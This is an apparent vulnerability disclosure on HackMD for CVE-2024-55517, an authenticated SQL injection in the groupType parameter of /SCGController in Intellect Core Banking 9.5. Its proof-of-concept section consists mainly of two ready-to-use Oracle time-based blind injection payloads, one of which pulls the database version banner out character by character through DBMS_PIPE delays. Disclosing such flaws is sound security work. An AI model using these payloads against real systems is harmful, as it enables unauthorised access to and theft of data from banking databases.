HackMDCVE-2024-55517 Intellect Core Banking
| Writer | Version | Last Updated |
|---|---|---|
| Nguyen Hong Phuc | The final | 08/01/2025 |
Description
An issue was discovered in the Interllect Core Search in Polaris FT. Input passed through the groupType parameter in /SCGController is mishandled before being used in SQL queries, allowing SQL injection in an authenticated session.
Target
Intellect Core Banking 9.5
PoC
Manipulate the input value sent to the database to execute SQLi with the command SLEEP(10).
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
02%' AND 4528=(CASE WHEN (ASCII(SUBSTR((SELECT NVL(CAST(banner AS VARCHAR(4000)),CHR(32)) FROM v$version WHERE ROWNUM=1),69,1))>104) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(89)||CHR(105)||CHR(109),10) ELSE 4528 END) AND 'gtXl%'='gtXl
OR
' OR 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(66)||CHR(67),10)--
